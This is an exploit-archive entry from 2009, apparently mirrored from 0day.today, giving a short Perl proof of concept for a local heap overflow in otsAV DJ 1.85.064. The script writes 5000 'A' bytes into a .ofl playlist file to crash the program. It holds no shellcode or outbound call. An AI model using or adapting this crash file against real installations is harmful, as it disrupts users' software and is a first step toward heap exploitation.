id: 6901
date: 07/08/2009
title: otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
author: hack4love
cves: 

=====================================================
otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
=====================================================


#!/usr/bin/perl
# Found By :: HACK4LOVE
# all i want say welcom back 3asfh
# otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavdjtrialsetup.exe
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################



#  0day.today [2023-03-22]  #